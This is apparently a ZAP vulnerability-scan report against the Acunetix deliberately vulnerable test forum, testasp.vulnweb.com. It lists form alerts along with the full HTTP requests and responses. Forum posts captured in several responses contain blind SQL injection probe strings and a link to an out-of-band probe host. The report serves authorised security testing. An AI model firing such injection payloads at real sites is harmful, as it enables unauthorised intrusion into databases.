Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4140 |
Response Body - size: 4,140 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>http://xfs.bxss.me</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=80 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=80 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 4153 |
Response Body - size: 4,153 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:02 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1" OR 2+332-332-1=0+0+0+1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=81 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=81 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 4153 |
Response Body - size: 4,153 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1" OR 3+332-332-1=0+0+0+1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=82 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=82 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 4151 |
Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:06 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1" OR 3*2<(0+5+332-332) -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=83 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=83 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 3844 |
Response Body - size: 3,844 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=9 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4197 |
Response Body - size: 4,197 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1 OR 3*2<(0+5+627-627) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1 OR 3*2<(0+5+627-627) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1 OR 3*2<(0+5+627-627) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
Method | POST |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 676 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 25 Origin: http://testasp.vulnweb.com Connection: keep-alive Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml Cookie: ASPSESSIONIDASSBRCRC=FCLMIJFALIPFLHBOMHKNEOFN Upgrade-Insecure-Requests: 1 |
Request Body - size: 25 bytes. |
tfUName=xptAfgrI&tfUPass=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:45 GMT Content-Length: 3256 |
Response Body - size: 3,256 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
Method | POST |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 682 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
